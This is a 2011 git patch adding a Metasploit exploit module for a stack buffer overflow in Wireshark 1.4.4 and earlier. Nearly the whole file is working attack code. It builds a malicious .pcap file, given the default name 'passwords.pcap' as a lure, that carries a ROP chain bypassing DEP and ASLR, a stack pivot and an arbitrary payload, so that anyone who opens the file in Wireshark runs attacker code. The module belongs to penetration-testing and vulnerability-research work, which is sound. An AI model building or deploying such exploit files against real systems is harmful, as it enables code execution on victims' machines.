From 9c60889f022cc001f0481663411a8f611c74a18b Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 19 Apr 2011 06:41:57 +0000 Subject: [PATCH] Added Wireshark packet-dect memcpy overflow (.pcap) git-svn-id: file:///home/svn/framework3/trunk@12362 4d416f70-5f16-0410-b530-b9f4589650da --- .../fileformat/wireshark_packet_dect.rb | 177 ++++++++++++++++++ 1 file changed, 177 insertions(+) create mode 100644 modules/exploits/windows/fileformat/wireshark_packet_dect.rb diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb new file mode 100644 index 0000000000..63fd53c6b8 --- /dev/null +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -0,0 +1,177 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark <= 1.4.4 Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Wireshark <= 1.4.4 + When opening a malicious .pcap file in Wireshark, a stack buffer occurs, + resulting in arbitrary code execution. + This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'sickness', #found the vulnerabilitiy + 'corelanc0d3r' #rop exploit + msf module + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], + [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], + [ 'URL', 'http://www.exploit-db.com/exploits/17185' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 936, + 'DisableNops' => 'True', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ '32-bit Windows Universal (Generic DEP & ASLR Bypass)', + { + 'OffSet' => 1243, + 'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'April 18 2011', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']), + ], self.class) + end + + def junk + return rand_text(4).unpack("L")[0].to_i + end + + def exploit + + print_status("Creating '#{datastore['FILENAME']}' file ...") + + global_header = "\xd4\xc3\xb2\xa1" # magic_number + global_header << "\x02\x00" # major version + global_header << "\x04\x00" # minor version + global_header << "\x00\x00\x00\x00" # GMT to local correction + global_header << "\x00\x00\x00\x00" # accuracy + global_header << "\xff\x7f\x00\x00" # snaplen + global_header << "\x01\x00\x00\x00" # data link type + + packet_header = "\x26\x32\xac\x4d" #timestamp seconds + packet_header << "\xda\xfa\x00\x08" #timestamp microseconds + packet_header << "\x04\x06\x00\x00" #nr of octets of packet in file + packet_header << "\x04\x06\x00\x00" #actual size of packet (1540) + + ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23" + + print_status("Preparing payload") + + pivot = [target.ret].pack('V') + + # pvefindaddr rop 'n roll + # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below + rop_pivot = + [ + 0x618d7d0e, # RET + 0x618d7d0e, # RET + 0x618d7d0e, # RET + 0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll + 0x618d7d0e, # RET <- don't count on this one ! + 0x618d7d0e, # RET + 0x618d7d0e, # RET + 0x618d7d0e, # RET + 0x61C14268, # ADD ESP,24 # RETN - freetype6.dll + 0xFFFFFFFF, # crash baby ! + 0xFFFFFFFF, + 0xFFFFFFFF, + 0xFFFFFFFF, + 0xFFFFFFFF, + 0x618d7d0e, + 0x618d7d0e, + 0x618d7d0e, + 0x618d7d0e, + ].pack("V*") + + rop_gadgets = + [ + + 0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] + junk, + 0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] + junk, + junk, + 0x61c14552, # POP EBX # RETN ** [freetype6.dll] + 0x00000800, # size - 0x800 should be more than enough + 0x61c14043, # POP ESI # RETN ** [freetype6.dll] + 0x0000009C, + 0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] + junk, + junk, + 0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] + 0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] + 0x62d9027c, # + 0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] + 0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] + 0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] + 0x00000040, # + 0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] + 0x6536B010, # RW + 0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] + 0x618d7d0e, # RET + 0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] + 0x618d7d0e, # RET + 0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] + ].pack("V*") + + pivot = [target.ret].pack('V') + + buffer = rand_text(131) + buffer << rop_pivot + buffer << rop_gadgets + + nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) + + buffer << nops + buffer << payload.encoded + buffer << pivot + + filler = 1540 - buffer.length + + buffer << rand_text(filler) + + filecontent = global_header + filecontent << packet_header + filecontent << ptype + filecontent << buffer + + print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") + + file_create(filecontent) + end +end